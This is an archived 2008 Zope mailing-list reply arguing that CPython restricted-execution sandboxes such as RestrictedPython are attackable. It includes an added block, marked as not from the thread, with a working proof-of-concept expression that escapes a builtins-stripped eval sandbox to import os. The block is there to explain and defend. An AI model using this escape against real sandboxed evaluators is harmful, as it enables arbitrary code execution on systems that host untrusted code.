--On 16. August 2008 13:11:13 +0200 "M.-A. Lemburg" <[EMAIL PROTECTED]> wrote:

> In my experience, attempts to create a sandbox that protects
> sufficiently against unwanted resource usage are either too
> restrictive and slow to make them useful or have problems
> preventing DOS attacks.

I think you can't solve the issue with the standard technology we have in CPython. I remember that Python once had a restricted execution environment. Wasn't it buggy as hell? RestrictedPython of Zope surely has similar problems. As with all such restricted execution environments (not only in Zope): they are attackable.

> It's usually a lot better (and more efficient) to use trusted
> code only.

Definitely. A common development pattern is the usage of CMF and portal_skins where you work with PythonScripts on the filesystem. The scripts themselves still run under the control of RestrictedPython however the whole development model can be regarded as being trusted.

> BTW: The reason why I had a look at these was that Chris Withers
> mentioned at EuroPython that they are currently causing delays
> in the Python 2.5 adoption (or at least are one of the reasons
> for them).

Is Chris' talk somewhere online?
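The following is an added example, not code from this thread, from Zope or from RestrictedPython. It illustrates the point made above that a restricted execution environment built on stock CPython is attackable: the "sandbox" is the naive one of evaluating untrusted code with its builtins removed, and the attacker expression walks the object graph from a tuple literal back to a live builtins namespace without needing a single builtin name. The function and constant names (naive_sandbox_eval, ESCAPE_EXPR, escape_naive_sandbox) are this example's own. RestrictedPython uses AST rewriting rather than this naive approach, so this block makes no claim about any specific RestrictedPython bypass; it only shows why "remove the dangerous builtins" is not a security boundary in CPython.

```python
"""Added example (not from the thread or from Zope/RestrictedPython).

A naive CPython sandbox that strips builtins, and an attacker expression
that escapes it by walking the object graph. Names are this example's own.
"""


def naive_sandbox_eval(expr):
    """The naive sandbox: eval() with an empty builtins namespace.

    Assumption: the defender believes that removing __import__, open,
    getattr etc. from builtins is enough to contain untrusted code.
    """
    return eval(expr, {"__builtins__": {}}, {})


def direct_import_is_blocked():
    """The obvious attack fails: __import__ is not a resolvable name."""
    try:
        naive_sandbox_eval("__import__('os')")
    except NameError:
        return True
    return False


# Attacker-controlled expression. It uses only attribute access, a list
# comprehension and subscripts, none of which needs a builtin:
#   ()                   a tuple literal
#   .__class__.__base__  -> object
#   .__subclasses__()    -> every class loaded in the interpreter
# For each class whose __init__ is a Python function (not a C slot
# wrapper), __init__.__globals__ is that function's module namespace,
# and its '__builtins__' entry is the interpreter's real builtins dict.
# The final check skips __main__, where __builtins__ is a module object.
ESCAPE_EXPR = (
    "[c.__init__.__globals__['__builtins__']"
    " for c in ().__class__.__base__.__subclasses__()"
    " if c.__init__.__class__.__name__ == 'function'"
    " and '__builtins__' in c.__init__.__globals__"
    " and c.__init__.__globals__['__builtins__'].__class__.__name__ == 'dict'"
    "][0]['__import__']('os')"
)


def escape_naive_sandbox():
    """Run the attacker expression inside the sandbox; returns the os module."""
    return naive_sandbox_eval(ESCAPE_EXPR)


if __name__ == "__main__":
    print("direct __import__ blocked:", direct_import_is_blocked())
    os_mod = escape_naive_sandbox()
    print("escaped; recovered module:", os_mod.__name__, "cwd:", os_mod.getcwd())
```

The escape relies only on the fact that every Python object carries a reference path back to the interpreter's class hierarchy and module namespaces, which is why containment has to be done at the process or OS level (separate processes, seccomp, containers) rather than by filtering names inside the interpreter, matching the recommendation in the thread to run trusted code only.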



Zope maillist  -  Zope@zope.org
**   No cross posts or HTML encoding!  **
(Related lists - 
 http://mail.zope.org/mailman/listinfo/zope-dev )
